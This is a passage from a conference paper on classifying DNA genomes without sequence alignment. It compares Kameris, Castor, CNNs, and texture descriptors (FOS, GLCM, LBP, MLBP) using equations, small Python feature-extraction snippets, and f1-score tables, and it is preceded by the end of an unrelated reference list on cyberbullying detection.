4. American Academy of Child Adolescent Psychiatry: Facts for families guide. The American Academy of Child Adolescent Psychiatry (2016). http://www.aacap.org/AACAP/Families_and_Youth/Facts_for_Families/FFF-Guide/FFF-Guide-Home.aspx
5. Goldman, R.: Teens indicted after allegedly taunting girl who hanged herself (2010). http://abcnews.go.com/Technology/TheLaw/
6. Smith-Spark, L.: Hanna Smith suicide fuels call for action on ask.fm cyberbullying (2013). http://www.cnn.com/2013/08/07/world/europe/uk-social-media-bullying/
7. Cyberbullying Research Center. http://cyberbullying.org/. Accessed 06 Aug 2022
8. Salawu, S., He, Y., Lumsden, J.: Approaches to automated detection of cyberbullying: a survey. IEEE Trans. Affect. Comput. 11(1), 3–24 (2020). https://doi.org/10.1109/TAFFC.2017.2761757
9. Sartor, G., Loreggia, A.: Study: The impact of algorithms for online content filtering or moderation (upload filters). European Parliament (2020)
10. Amazon Mechanical Turk, 15 Aug 2014. http://ocs.aws.amazon.com/AWSMMechTurk/latest/AWSMechanical-TurkGetingStartedGuide/SvcIntro.html. Accessed 3 July 2020
11. Garner, S.: Weka: the Waikato environment for knowledge analysis. In: Proceedings of the New Zealand Computer Science Research Students Conference, pp. 57–64, New Zealand (1995)
12. Nahar, V., Li, X., Pang, C.: An effective approach for cyberbullying detection. Commun. Inf. Sci. Manag. Eng. 3(5), 238 (2013)
13. Chen, Y., Zhou, Y., Zhu, S., Xu, H.: Detecting offensive language in social media to protect adolescent online safety. In: Privacy, Security, Risk and Trust (PASSAT), 2012 International Conference on Social Computing (SocialCom), pp. 71–80 (2012)
14. Sri Nandhinia, B., Sheeba, J.I.: Online social network bullying detection using intelligence techniques. In: International Conference on Advanced Computing Technologies and Applications (ICACTA-2015). Procedia Comput. Sci. 45, 485–492 (2015)
15. Romsaiyud, W., Nakornphanom, K., Prasertslip, P., Nurarak, P., Pirom, K.: Automated cyberbullying detection using clustering appearance pattern. In: 2017 9th International Conference on Knowledge and Smart Technology (KST), pp. 2–247. IEEE (2017)
16. Atoum, J.O.: Cyberbullying detection neural networks using sentiment analysis. In: 2021 International Conference on Computational Science and Computational Intelligence (CSCI), pp. 158–164 (2021). https://doi.org/10.1109/CSCI54926.2021.00098
17. Bosco, C., Patti, V., Bolioli, A.: Developing corpora for sentiment analysis: the case of Irony and Senti–TUT. In: Proceedings of the Twenty-Fourth International Joint Conference on Artificial Intelligence (IJCAI 2015), pp. 4158–4162 (2015)
18. Rajput, B.S., Khare, N.: A survey of stemming algorithms for information retrieval. IOSR J. Comput. Eng. (IOSR-JCE) 17(3), Ver. VI (May–Jun. 2015), 76–78. e-ISSN: 2278–0661, p-ISSN: 2278–8727
19. Chen, L., Wang, W., Nagaraja, M., Wang, S., Sheth, A.: Beyond positive/negative classification: automatic extraction of sentiment clues from microblogs. Kno.e.sis Center, Technical Report (2011)
20. Fattah, M.A.: A novel statistical feature selection approach for text categorization. J. Inf. Process. Syst. 13, 1397–1409 (2017)
21. Tian, L., Lai, C., Moore, J.D.: Polarity and intensity: the two aspects of sentiment analysis. In: Proceedings of the First Grand Challenge and Workshop on Human Multimodal Language (Challenge-HML), pp. 40–47, Melbourne, Australia, 20 July 2018. Association for Computational Linguistics (2018)
22. Safavian, S.R., Landgrebe, D.: A survey of decision tree classifier methodology. IEEE Trans. Syst. Man Cybern. 21(3), 660–674 (1991)
23. Pal, M.: Random forest classifier for remote sensing classification. Int. J. Remote Sens. 26(1), 217–222 (2005)
24. Friedman, N., Geiger, D., Goldszmidt, M.: Bayesian network classifiers. Mach. Learn. 29(2–3), 131–163 (1997)
25. Cortes, C., Vapnik, V.N.: Support-vector networks. Mach. Learn. 20(3), 273–297 (1995). CiteSeerX 10.1.1.15.9362. https://doi.org/10.1007/BF00994018
26. LeCun, Y., Bengio, Y., Hinton, G.: Deep learning. Nature 521(7553), 436–444 (2015)
27. Mikolov, T., Corrado, G., Chen, K., Dean, J.: Efficient estimation of word representations in vector space. In: Proceedings of the International Conference on Learning Representations (ICLR 2013), pp. 1–12 (2013)
28. Bengio, Y., Ducharme, R., Vincent, P.: A neural probabilistic language model. J. Mach. Learn. Res. 3, 1137–1155 (2003)
29. Kim, Y.: Convolutional neural networks for sentence classification. In: Proceedings of the 2014 Conference on Empirical Methods in Natural Language Processing (EMNLP 2014), pp. 1746–1751 (2014)
30. Severyn, A., Moschitti, A.: Twitter sentiment analysis with deep convolutional neural networks. In: Proceedings of the 38th International ACM SIGIR Conference on Research and Development in Information Retrieval - SIGIR 2015, pp. 959–962 (2015)
31. Conneau, A., Schwenk, H., Barrault, L., Lecun, Y.: Very deep convolutional networks for natural language processing. KI - Künstliche Intelligenz 26(4), 357–363 (2016)
DNA Genome Classification with Machine Learning and Image Descriptors
Daniel Prado Cussi1(B) and V. E. Machaca Arceda2
1 Universidad Nacional de San Agustín, Arequipa, Peru [email protected]
2 Universidad La Salle, Mexico City, Mexico [email protected]
Abstract. Sequence alignment is the most widely used method in Bioinformatics. Nevertheless, it is slow. For that reason, several methods that are not based on alignment have been proposed to compare sequences. In this work, we analyzed Kameris and Castor, two alignment-free methods for DNA genome classification, and compared them against the most popular CNN networks: VGG16, VGG19, Resnet-50, and Inception. We also compared them with image descriptor methods, namely First-order Statistics (FOS), Gray-level Co-occurrence Matrix (GLCM), Local Binary Pattern (LBP), and Multi-resolution Local Binary Pattern (MLBP), combined with classifiers such as Support Vector Machine (SVM), Random Forest (RF), and k-nearest neighbors (KNN). From this comparison, we concluded that FOS, GLCM, LBP, and MLBP, all with SVM, obtained the best f1-scores, followed by Castor and Kameris and finally by the CNNs. Furthermore, Castor had a lower processing time. Finally, according to the experiments, 5-mer (used by Kameris and Castor) and 6-mer outperformed 7-mer.
Keywords: Alignment-free methods · Frequency chaos game representation · Alignment-based methods · CNN · Kameris · Castor · FOS · GLCM · LBP · MLBP
1 Introduction
Sequence alignment is a fundamental procedure in Bioinformatics. The method is very important for discovering similar regions of DNA [15,42]. It has a relevant impact in many applications such as viral classification, phylogenetic analysis, and drug discovery [40]. The main problems of sequence alignment are its high processing time and memory consumption [19,60]. Moreover, despite the efforts of scientists to develop more efficient algorithms [9,30,56,59], this problem is not yet resolved. For that reason, there is another approach to comparing sequences, known as alignment-free methods; they use DNA descriptors and machine learning models to classify and compare sequences.
© The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 K. Arai (Ed.): FICC 2023, LNNS 652, pp. 39–58, 2023. https://doi.org/10.1007/978-3-031-28073-3_4
We have used some methods based on k-mer frequencies. K-mers have been applied in genome computation and sequence analysis [46]. In this work, we analyzed two alignment-free methods (Kameris and Castor) against VGG16, VGG19, Resnet-50, Inception, First-order Statistics (FOS), Gray Level Co-occurrence Matrix (GLCM), Local Binary Pattern (LBP), and Multi-resolution Local Binary Pattern (MLBP). This is an extension of a previous work that compared Kameris and Castor against small CNN models [31]. Moreover, we included processing time comparisons to show the advantages of alignment-free methods. FOS, LBP, GLCM, and MLBP are image descriptors used in computer vision. In this work, they are used to extract information from DNA, and we refer to them as "image descriptor methods". The work is structured as follows: Sect. 2 presents the related works, and Sect. 3 explains the data, materials, and methods used. Section 4 details the experiments and results, Sect. 5 describes the limitations, Sect. 6 presents the conclusions, and Sect. 7 defines the future work.
2 Related Work
Alignment-free methods are relevant. For example, in COVID studies, some researchers used DNA descriptors with machine learning models to find a class for the COVID virus. These studies concluded that the virus belongs to Betacoronavirus, inferring that it originated in bats [14,26]. There are four interesting alignment-free methods that are used in multiple fields of bioinformatics: First-Order Statistics (FOS), Gray-level Co-occurrence Matrix (GLCM), Local Binary Patterns (LBP), and Multi-resolution Local Binary Patterns (MLBP). Delibaş proposed a new approach to DNA sequence similarity analysis that uses FOS to calculate the similarity of textures [10]. FOS was useful for creating a reliable and effective method that can be applied to computed tomography (CT) images of COVID-19 obtained from radiographs for the purpose of monitoring the disease [54]. FOS was also applied in an automated system to diagnose the same disease without emitting radiation as computerized tomography does [17]. One of the most common methods used in image texture analysis is the GLCM [6]. It has been relevant in healthcare, where it was part of a novel solution to improve the diagnosis of COVID-19 [3]. It was also employed to extract textural features from histopathological images [34]. In addition, GLCM and LBP were fused to propose a texture feature extraction technique for volumetric images, which improves discrimination compared with works using deep learning networks [4]. Finally, GLCM features were applied to the problem of automatic online signature verification; among the models tested, they were found to work best with the SVM model [49]. In recent years, the LBP feature extraction method, which describes surface texture features [36], has been used in various applications,
making remarkable progress in texture classification [20,43] and facial recognition applications [22,33,47,55]. It has also been relevant in bioinformatics, where it was used to predict protein-protein interactions [28] and to predict the subcellular localization of proteins in images of human reproductive tissues [58]. Additionally, an improved version of LBP, called Multi-resolution Local Binary Pattern (MLBP), was developed [23]. This version was used to classify normal breast tissue and masses on mammograms, reducing false positive detections in computer-assisted detection of breast masses [7]. Alignment-free methods are able to solve problems in different areas; for example, Virfinder (an alignment-free method) was developed to identify viral sequences using k-mer frequencies [41]. Another robust alignment-free method was developed to discriminate between enzymes and non-enzymes, obtaining a remarkable result [8]. In genetics, alignment-free methods have far outperformed alignment-based methods in measuring the closeness between DNA sequences at the data preprocessing stage [46]. Protein sequence similarity is a relevant topic in bioinformatics. A new alignment-free method has been developed to perform similarity analysis between proteins of different species, allowing a global comparison of multiple proteins [12]. Alignment-free methods have also been applied to topics such as the evolutionary relationship between species, such as humans, chimpanzees, and orangutans [37]. These methods can be divided into several categories, one of the most relevant being k-mer frequencies [1]. K-mers are sequences of k characters [27] and have many applications in metagenomic classification [57] and repeat classification [5]. In recent years, CNNs have become very relevant. For example, Inception-v3 was used to recognize the boundaries between exons and introns [45]. Additionally, it was used to predict skin cancer [44]. Moreover, VGG16 was employed for non-invasive detection of COVID-19 [35] and was applied together with the PILAE algorithm to achieve better performance in classifying DNA sequences of living organisms [32]. Finally, a method was developed that allows DNA comparisons: the authors transformed the sequences into FCGR images and then used SVD. In that project, the method outperformed BLAST [29].
The works mentioned above have some shortcomings. For example, in [3,54] the accuracy falls short of 100%, which matters because people's health is at stake, although both works showed improvements with their proposals. Additionally, for most image descriptor methods we found very little research related to DNA genome classification. We therefore decided to compare the four alignment-free image descriptor methods (FOS, GLCM, LBP, and MLBP) with three classifiers (SVM, KNN, and RFC) in this paper, noting that FOS has some interesting characteristics and that the SVM classifier has shown good performance [4]; the experiments report this comparison. The main idea of the work is to find new alternatives to the traditional alignment-based methods, which become very slow as the data grows. We also compare all the alignment-free methods considered, with the aim of discovering which of them obtains the best score and the best processing time.
3 Materials and Methods
In this section, we describe the method based on CNNs, two alignment-free methods (Kameris and Castor), First-Order Statistics (FOS), Gray Level Co-occurrence Matrix (GLCM), Local Binary Pattern (LBP), and Multi-resolution Local Binary Pattern (MLBP).
3.1 CNNs and Chaos Game Representation
In order to use CNNs, we need an image; for that reason, we used Frequency Chaos Game Representation (FCGR). FCGR creates images that store the frequencies of k-mers according to the value of k [2,11]. There are several works inspired by FCGR. In our case, we have focused on the so-called Intelligent Icons, proposed by Kumar and Keogh, where these bitmaps provide a very good overview of the values and their sequence in the dataset [21,24]. Then, we used VGG16, VGG19, Resnet-50, and Inception to build a classifier. VGG16 is a deep learning architecture with 16 layers, composed of 13 convolutional layers and three fully connected layers. The model achieves 92.7% top-5 test accuracy on ImageNet. VGG19 is a variant of VGG16 with more depth [48]. We also applied Resnet-50, a convolutional neural network trained on more than one million images from the ImageNet database. The network is 50 layers deep and can classify images into 1000 object categories. As a result, the network has learned feature-rich representations for a wide range of images [18]. Finally, we used Inception-v3, a convolutional neural network architecture belonging to the Inception family, developed by Google. The model presents several improvements, such as label smoothing, factorized 7 × 7 convolutions, and the use of an auxiliary classifier to propagate label information lower down the network [52,53]. Regarding data preprocessing, the genomic sequences in the DNA datasets are categorical, so we used one-hot encoding to transform the categorical data into numerical data [16]. For the CNN architectures (VGG16, VGG19, Resnet-50, and Inception-v3), we used the Adam optimizer in all cases, a mini-batch size of 32, and 20 epochs.
3.2 Kameris and Castor
Kameris is an open-source, supervised, alignment-free subtyping method that operates on k-mer frequencies in HIV-1 sequences [50]. The approach taken by Kameris is that feature vectors expressing the respective k-mer frequencies of the virus sequences are passed to known supervised classifiers. The genomic sequences are preprocessed by removing any ambiguous nucleotide codes [13].
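The k-mer frequency feature vector described above can be sketched as follows. This is an illustrative approximation, not the Kameris implementation: the function name `kmer_frequencies` is hypothetical, normalizing counts to relative frequencies is an assumption, and ambiguous codes are simply deleted before counting (which joins the flanking bases), a simplification that the original tool may handle differently.

```python
from itertools import product


def kmer_frequencies(sequence, k):
    """Return relative k-mer frequencies in lexicographic order over A, C, G, T."""
    alphabet = "ACGT"
    # Assumption: drop ambiguous nucleotide codes (anything other than A, C, G, T).
    cleaned = "".join(base for base in sequence.upper() if base in alphabet)
    counts = {"".join(kmer): 0 for kmer in product(alphabet, repeat=k)}
    for i in range(len(cleaned) - k + 1):
        counts[cleaned[i:i + k]] += 1
    total = sum(counts.values())
    return [counts[kmer] / total if total else 0.0 for kmer in counts]


# Toy sequence with one ambiguous code (N), for illustration only.
vector = kmer_frequencies("ACGTNACGT", k=2)
print(len(vector))
```

The resulting vector has 4^k entries (16 for k = 2, 1024 for k = 5) and can be passed to any standard supervised classifier.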
Castor-KRFE is an alignment-free method that extracts discriminating k-mers from known pathogen sequences in order to detect and classify new sequences accurately. CASTOR is powerful at identifying a minimal set of features, which makes classifying sequences much simpler and increases performance [25].
3.3 FOS, GLCM, LBP, and MLBP
3.3.1 First-Order Statistics
First-Order Statistics (FOS) is applied to DNA sequence similarity analysis between two or more sequences in an alignment-free manner, contributing new mathematical descriptors of DNA sequences [10]. In the method proposed by Delibaş et al. [10], DNA sequences are converted into feature vectors: the sequences are represented as images, and the histogram is then computed. Each pair of bases (Eq. 1) has a value from 0 to 15. Then, the feature vector is scaled to values from 1 to 255, and the histogram is computed. Four attributes are then computed from the histogram to form a feature vector: skewness, kurtosis, energy, and entropy (see Eqs. 2, 3, 4, 5). Finally, this feature vector can be used for similarity analysis against other vectors using the Euclidean distance:

$$\alpha = \{AA, AG, AC, AT, GA, GG, GC, GT, CG, CC, CT, CA, TA, TG, TC, TT\} \tag{1}$$

$$\text{Skewness} = \sigma^{-3} \sum_{i=0}^{G-1} (i - \mu)^3 \, p(i) \tag{2}$$

$$\text{Kurtosis} = \sigma^{-4} \sum_{i=0}^{G-1} (i - \mu)^4 \, p(i) - 3 \tag{3}$$

$$\text{Energy} = \sum_{i=0}^{G-1} p(i)^2 \tag{4}$$

$$\text{Entropy} = -\sum_{i=0}^{G-1} p(i) \, \lg(p(i)) \tag{5}$$

where $p(i) = h(i)/(NM)$, $h(i)$ is the histogram, $N$ and $M$ are the image's width and height, $G$ is the number of gray levels, $\mu = \sum_{i=0}^{G-1} i \, p(i)$, and $\sigma$ is the corresponding standard deviation.
3.3.2 Gray-Level Co-occurrence Matrix
GLCM is a technique for evaluating textures by taking into account the spatial relationship of pixels. It is a method of image texture analysis that has also found use in bioinformatics [38]. The texture features that GLCM yields are entropy, contrast, energy, correlation, and homogeneity, which are useful for describing image texture [6].
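Returning to the first-order statistics of Eqs. 2 to 5, the following sketch computes the four FOS attributes from a DNA string. Several details are assumptions made for illustration, since the text does not fix them: overlapping dinucleotides are used, the 0 to 15 values are rescaled linearly to 1 to 255, `lg` is taken as the base-2 logarithm, and the names `PAIRS` and `fos_features` are hypothetical.

```python
import math

# Dinucleotide order taken from Eq. 1; the index (0 to 15) is the pair's value.
PAIRS = ["AA", "AG", "AC", "AT", "GA", "GG", "GC", "GT",
         "CG", "CC", "CT", "CA", "TA", "TG", "TC", "TT"]
PAIR_VALUE = {pair: value for value, pair in enumerate(PAIRS)}


def fos_features(sequence, levels=256):
    """Skewness, kurtosis, energy, and entropy of the dinucleotide histogram."""
    seq = sequence.upper()
    # Assumption: overlapping pairs, linearly rescaled from 0..15 to 1..255.
    pairs = (seq[i:i + 2] for i in range(len(seq) - 1))
    values = [1 + round(PAIR_VALUE[pair] * 254 / 15)
              for pair in pairs if pair in PAIR_VALUE]
    if not values:
        raise ValueError("sequence contains no valid dinucleotides")

    hist = [0] * levels
    for value in values:
        hist[value] += 1
    p = [h / len(values) for h in hist]  # normalized histogram p(i)

    mu = sum(i * p_i for i, p_i in enumerate(p))
    sigma = math.sqrt(sum((i - mu) ** 2 * p_i for i, p_i in enumerate(p)))
    if sigma > 0:
        skewness = sum((i - mu) ** 3 * p_i for i, p_i in enumerate(p)) / sigma ** 3
        kurtosis = sum((i - mu) ** 4 * p_i for i, p_i in enumerate(p)) / sigma ** 4 - 3
    else:
        skewness = kurtosis = 0.0  # constant signal: these moments are undefined
    energy = sum(p_i ** 2 for p_i in p)
    entropy = -sum(p_i * math.log2(p_i) for p_i in p if p_i > 0)
    return {"skewness": skewness, "kurtosis": kurtosis,
            "energy": energy, "entropy": entropy}


# Toy sequence, for illustration only.
features = fos_features("AATT")
print(features)
```

Two sequences could then be compared through the Euclidean distance between their four-element feature vectors, as described in the text.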
This algorithm was proposed by Chen et al. [6] for sequence comparison; they convert the DNA sequences into feature vectors and compute the GLCM. Each base of the alphabet {A, C, G, T} is mapped to a number in {1, 2, 3, 4}. Then, the base position is added to each value. Finally, the Gray-Level Co-occurrence Matrix (GLCM) is computed. The GLCM is an algorithm that counts the occurrences of changes in the intensities of neighboring pixels. For example, in Fig. 1 (left), there is a 2D input matrix A with intensities from 1 to n = 5, so the GLCM will be an n × n matrix. In the output matrix GLCM, the cell [i, j] represents the number of occurrences where a pixel with intensity i has a horizontal neighbor pixel with intensity j. Thus, the cell [1, 1] has a value of 1 because there is just one occurrence in the input matrix where a pixel with intensity 1 has a horizontal neighbor with intensity 1. The cell [1, 2] has a value of 2 because there are two occurrences where a pixel with intensity 1 has a horizontal neighbor with intensity 2. More GLCM matrices could be obtained by considering vertical and diagonal neighbors, but the work of Chen et al. [6] considers only horizontal neighbors. After the GLCM is computed, it is normalized to the range from 0 to 1. Then, the entropy, contrast, energy, correlation, and homogeneity are computed (see Eqs. 6, 7, 8, 9 and 10). These five features represent the sequence's feature vector.
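The horizontal co-occurrence counting and the five texture features can be sketched for a 1D sequence as follows. This is a simplified illustration rather than the procedure of Chen et al.: the step that adds the base position to each value is omitted, normalization divides by the total number of neighbor pairs, and the names `BASE_TO_INT`, `glcm_1d`, and `glcm_features` are hypothetical.

```python
import math

# Base-to-integer mapping described in the text.
BASE_TO_INT = {"A": 1, "C": 2, "G": 3, "T": 4}


def glcm_1d(values, levels):
    """Normalized co-occurrence matrix of each value with its right neighbor."""
    if len(values) < 2:
        raise ValueError("need at least two values")
    matrix = [[0] * levels for _ in range(levels)]
    for left, right in zip(values, values[1:]):
        matrix[left - 1][right - 1] += 1
    total = len(values) - 1
    return [[count / total for count in row] for row in matrix]


def glcm_features(p):
    """Entropy, contrast, energy, correlation, and homogeneity of a GLCM."""
    size = len(p)
    cells = [(i + 1, j + 1, p[i][j]) for i in range(size) for j in range(size)]
    entropy = -sum(v * math.log(v) for _, _, v in cells if v > 0)
    contrast = sum((i - j) ** 2 * v for i, j, v in cells)
    energy = sum(v ** 2 for _, _, v in cells)
    homogeneity = sum(v / (1 + abs(i - j)) for i, j, v in cells)
    mu_i = sum(i * v for i, _, v in cells)
    mu_j = sum(j * v for _, j, v in cells)
    sigma_i = math.sqrt(sum((i - mu_i) ** 2 * v for i, _, v in cells))
    sigma_j = math.sqrt(sum((j - mu_j) ** 2 * v for _, j, v in cells))
    if sigma_i > 0 and sigma_j > 0:
        correlation = sum((i - mu_i) * (j - mu_j) * v
                          for i, j, v in cells) / (sigma_i * sigma_j)
    else:
        correlation = 0.0  # degenerate case: a single row or column is occupied
    return {"entropy": entropy, "contrast": contrast, "energy": energy,
            "correlation": correlation, "homogeneity": homogeneity}


# Toy sequence, for illustration only.
values = [BASE_TO_INT[base] for base in "ACGTACGT"]
glcm = glcm_1d(values, levels=4)
features = glcm_features(glcm)
print(features)
```

Vertical or diagonal neighbors do not exist for a 1D vector, so only the horizontal offset is counted here.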
Fig. 1. Examples of GLCM Algorithm. Left: GLCM Computed from a 2D Matrix with Intensities from 1 to 5. Right: GLCM Computed from a 1D Vector with Intensities from 1 to 4.
$$\text{Entropy} = -\sum_{i=1}^{L} \sum_{j=1}^{L} p(i, j) \ln(p(i, j)) \tag{6}$$

$$\text{Contrast} = \sum_{i=1}^{L} \sum_{j=1}^{L} (i - j)^2 \, p(i, j) \tag{7}$$

$$\text{Energy} = \sum_{i=1}^{L} \sum_{j=1}^{L} p(i, j)^2 \tag{8}$$

$$\text{Correlation} = \sum_{i=1}^{L} \sum_{j=1}^{L} \frac{(i - \mu_i)(j - \mu_j) \, p(i, j)}{\sigma_i \sigma_j} \tag{9}$$

$$\text{Homogeneity} = \sum_{i=1}^{L} \sum_{j=1}^{L} \frac{p(i, j)}{1 + |i - j|} \tag{10}$$

where $p(i, j)$ is the GLCM matrix, $L$ is the maximum intensity value, and $\mu_i$, $\mu_j$, $\sigma_i$, and $\sigma_j$ are the means and standard deviations of the row and column marginals of $p$.
3.3.3 Multi-resolution Local Binary Pattern
Like the previous methods, LBP is a texture descriptor [51]. More specifically, LBP is an algorithm that describes the local texture features of an image. It is relevant in image processing, image retrieval, and scene analysis [28]. LBP was initially proposed for image texture analysis, but it has been adapted to 1D signals; Eq. 11 presents the LBP descriptor.

$$LBP(x(t)) = \sum_{i=0}^{p/2-1} \Big( \mathrm{Sign}\big(x(t + i - p/2) - x(t)\big) \, 2^{i} + \mathrm{Sign}\big(x(t + i + 1) - x(t)\big) \, 2^{i + p/2} \Big) \tag{11}$$

where $p$ is the number of neighbouring points and Sign is:

$$\mathrm{Sign}(x) = \begin{cases} 0, & x < 0 \\ 1, & x \geq 0 \end{cases} \tag{12}$$

$$h_k = \sum_{p/2 \leq i \leq N - p/2} \delta\big(LBP_p(x(i)), k\big) \tag{13}$$

where $\delta$ is the Kronecker delta function, $k = 1, 2, \ldots, 2^p$, and $N$ is the sequence length. In Eq. 13, $h_k$ represents the histogram, and it is the feature vector of the LBP descriptor. MLBP is an extension of LBP that combines the results of LBP for several values of $p$. Kouchaki et al. [23] proposed the use of MLBP for sequence comparison. First, they mapped a sequence with the values of Table 1; then they applied MLBP with p = 2, 3, 4, 5 and 6. Finally, the result was used as a feature vector for clustering. MLBP is adapted to comparisons of data represented as numerical nucleotide sequences. MLBP can capture changes in the genomic signature, allowing for alignment-free comparisons and clustering of related contigs [23].
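The 1D LBP code of Eq. 11 and the histogram of Eq. 13 can be sketched as below, with MLBP obtained by concatenating the histograms for several values of p. This is an illustrative sketch under assumptions: only even values of p are used so that p/2 is an integer (the text also lists odd values), indices are 0-based with codes running from 0 to 2^p - 1, the sequence is encoded with the "Real" column of Table 1, and the names `REAL_VALUE`, `lbp_code`, `lbp_histogram`, and `mlbp_features` are hypothetical.

```python
# "Real" numeric representation of each base, as listed in Table 1.
REAL_VALUE = {"A": -1.5, "T": 1.5, "C": -0.5, "G": 0.5}


def lbp_code(x, t, p):
    """LBP code of sample x[t] using p/2 neighbors on each side (Eq. 11)."""
    half = p // 2
    code = 0
    for i in range(half):
        if x[t + i - half] - x[t] >= 0:   # left neighbors, weights 2^i
            code += 2 ** i
        if x[t + i + 1] - x[t] >= 0:      # right neighbors, weights 2^(i + p/2)
            code += 2 ** (i + half)
    return code


def lbp_histogram(x, p):
    """Histogram of LBP codes over all positions with a full neighborhood."""
    half = p // 2
    hist = [0] * (2 ** p)
    for t in range(half, len(x) - half):
        hist[lbp_code(x, t, p)] += 1
    return hist


def mlbp_features(x, neighbor_counts=(2, 4, 6)):
    """Concatenate LBP histograms for several values of p (assumed even)."""
    features = []
    for p in neighbor_counts:
        features.extend(lbp_histogram(x, p))
    return features


# Toy sequence, for illustration only.
signal = [REAL_VALUE[base] for base in "ACGTACGT"]
hist_p2 = lbp_histogram(signal, 2)
features = mlbp_features(signal)
print(hist_p2)
```

For p = 2, 4, and 6 the concatenated vector has 4 + 16 + 64 = 84 entries, which could then be fed to a clustering or classification method.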
4 Experiments and Results
In this section, we explain the datasets used, the metrics, and the results of our experiments.
Table 1. Numeric representation for each base used by Kouchaki et al. [23]
| Base | Integer | EIIP | Atomic | Real |
|---|---|---|---|---|
| A | 2 | 0.1260 | 70 | –1.5 |
| T | –2 | 0.1335 | 78 | 1.5 |
| C | –1 | 0.1340 | 58 | –0.5 |
| G | 2 | 0.0806 | 66 | 0.5 |
4.1 Datasets
We used the datasets from Castor and a group of datasets proposed by Randhawa et al. [39]. The first seven belong to Castor, and the rest to the second-mentioned database (see Table 2). HBVGENCG corresponds to the Hepatitis-B virus. HIVGRPCG, HIVSUBCG, and HIVSUBPOL belong to the first type of the human immunodeficiency virus (HIV-1); EBOSPECG contains a set of sequences of the deadly Ebola disease; RHISPECG is related to the common cold (Rhinovirus); and HPVGENCG is related to Human papillomavirus, a sexually transmitted disease.
Table 2. Datasets used in the experiments
| Datasets | Average seq. length | No. of classes | No. of instances |
|---|---|---|---|
| HIVGRPCG | 9164 | 4 | 76 |
| HIVSUBCG | 8992 | 18 | 597 |
| HIVSUBPOL | 1211 | 28 | 1352 |
| EBOSCPECG | 18917 | 5 | 751 |
| HBVGENCG | 3189 | 8 | 230 |
| RHISPECG | 369 | 3 | 1316 |
| HPVGENCG | 7610 | 3 | 125 |
| Primates | 16626 | 2 | 148 |
| Dengue | 10595 | 4 | 4721 |
| Protists | 31712 | 3 | 159 |
| Fungi | 49178 | 3 | 224 |
| Plants | 277931 | 2 | 174 |
| Amphibians | 17530 | 3 | 290 |
| Insects | 15689 | 7 | 898 |
| Vertebrates | 16806 | 5 | 4322 |
4.2 Metrics
The performance of the proposed approach was assessed using popular classification performance metrics. We employed the f1-score as the main metric, defined as follows:

$$F_1 = \frac{2TP}{2TP + FP + FN} \tag{14}$$

where TP, FP, and FN stand for true positives, false positives, and false negatives, respectively.
4.3 Results
In this section, we compare the performance of Castor, Kameris, VGG16, VGG19, Resnet-50, Inception-v3, and the image descriptor methods. Table 3 shows the best f1-scores we obtained with k = 5. We present Kameris and Castor without dimensionality reduction and feature elimination (they obtained better results this way). The CNNs obtained results quite close to those of Castor and Kameris. Moreover, Tables 4 and 5 present experiments with 5-mer, 6-mer, and 7-mer, which show certain improvements. On the Plants dataset, Inception with k = 7 obtained the highest f1-score on Plants reported in Tables 4 and 5, similar to Castor and outperforming Kameris. In addition, we tested feature vectors from the image descriptor methods and used them to make predictions with three popular machine learning methods: SVM, RFC, and KNN. These predictions did not use k-mers. Table 8 collects the best f1-scores from Tables 7, 6, and 3. It clearly shows that the image descriptor methods work better with SVM and that they outperform Castor and Kameris on datasets such as Plants, HIVSUBPOL, Vertebrates, and Insects, showing a promising outlook for DNA species classification. VGG19 (the best CNN) scored lower than Kameris and Castor, although it matched them on some datasets. Similarly, it underperformed the image descriptor methods FOS, GLCM, LBP, and MLBP. Compared with the previous paper that inspired this work, the image descriptor methods with the SVM classifier represent an improvement, because they perform better than Kameris and Castor. Additionally, with respect to the related works, we can deduce that image descriptor methods are a strong alternative for DNA genome classification, with FOS being a particularly interesting method. The reason is that this method is very similar to k-mer frequencies with k = 2. This is probably why FOS outperforms the rest, even in processing time.
4.4 Processing Time
There are two kinds of processing time: feature vector generation time and the second one, which is performed by taking the mentioned vector or, in the case
Table 3. We present the best f1-scores of the proposed methods. We use 5-mers for all methods
Dataset      Kameris  Castor  VGG16   VGG19   Resnet-50  Inception-v3
HIVGRPCG     1        1       0.8378  1       0.7997     1
HIVSUBCG     1        1       0.9654  0.9832  0.9490     0.9183
HIVSUBPOL    0.993    0.993   0.9418  0.9251  0.9382     0.7520
EBOSCPECG    1        1       1       1       1          1
HBVGENCG     1        1       1       0.9558  0.9781     0.9779
RHISPECG     1        1       1       1       0.9962     0.9771
HPVGENCG     1        1       0.9595  1       0.9173     0.9200
Primates     1        1       1       0.9235  0.9234     0.9235
Dengue       1        1       1       1       1          1
Protists     1        1       0.9103  0.9375  0.8893     1
Fungi        1        1       0.9782  0.9782  0.9574     0.8792
Plants       0.882    0.972   0.8857  0.7901  0.9152     0.8823
Amphibians   1        1       0.9116  0.9647  0.9617     0.9819
Insects      0.994    0.994   0.9103  0.9312  0.9105     0.8801
Vertebrates  0.998    0.998   0.9802  0.9874  0.9837     0.9573
Table 4. We present the f1-scores with several k-mers for VGG16 and VGG19
Dataset      VGG16                   VGG19
             k=5     k=6     k=7     k=5     k=6     k=7
HIVGRPCG     0.8378  0.9367  0.9125  1       0.9295  0.6728
HIVSUBCG     0.9654  0.9091  0.9286  0.9832  0.9117  0.9358
HIVSUBPOL    0.9418  0.9525  0.9291  0.9251  0.7819  0.7796
EBOSCPECG    1       1       0.9940  1       0.9940  1
HBVGENCG     1       0.9779  1       0.9558  1       1
RHISPECG     1       0.9925  1       1       0.9962  0.9924
HPVGENCG     0.9595  0.8844  0.92    1       0.8786  0.8828
Primates     1       0.9333  0.8727  0.9235  0.9646  0.8727
Dengue       1       1       1       1       1       1
Protists     0.9103  0.8843  0.9701  0.9375  0.9382  0.9422
Fungi        0.9782  0.8866  0.9314  0.9782  0.8866  0.9314
Plants       0.8857  0.8501  0.9428  0.7901  0.9429  0.9152
Amphibians   0.9116  0.9502  1       0.9647  0.9827  0.9820
Insects      0.9103  0.8914  0.8705  0.9312  0.9117  0.8930
Vertebrates  0.9802  0.9798  0.9766  0.9874  0.9721  0.9716
Table 5. We present the f1-scores with several k-mers for Resnet-50 and Inception
Dataset      Resnet-50               Inception
             k=5     k=6     k=7     k=5     k=6     k=7
HIVGRPCG     0.7997  0.8487  1       1       0.7628  0.6578
HIVSUBCG     0.9490  1       0.9458  0.9183  0.9117  0.9359
HIVSUBPOL    0.9382  0.9525  0.9366  0.7520  0.9331  0.9405
EBOSCPECG    1       1       1       1       1       1
HBVGENCG     0.9781  0.9579  0.9778  0.9779  1       0.9784
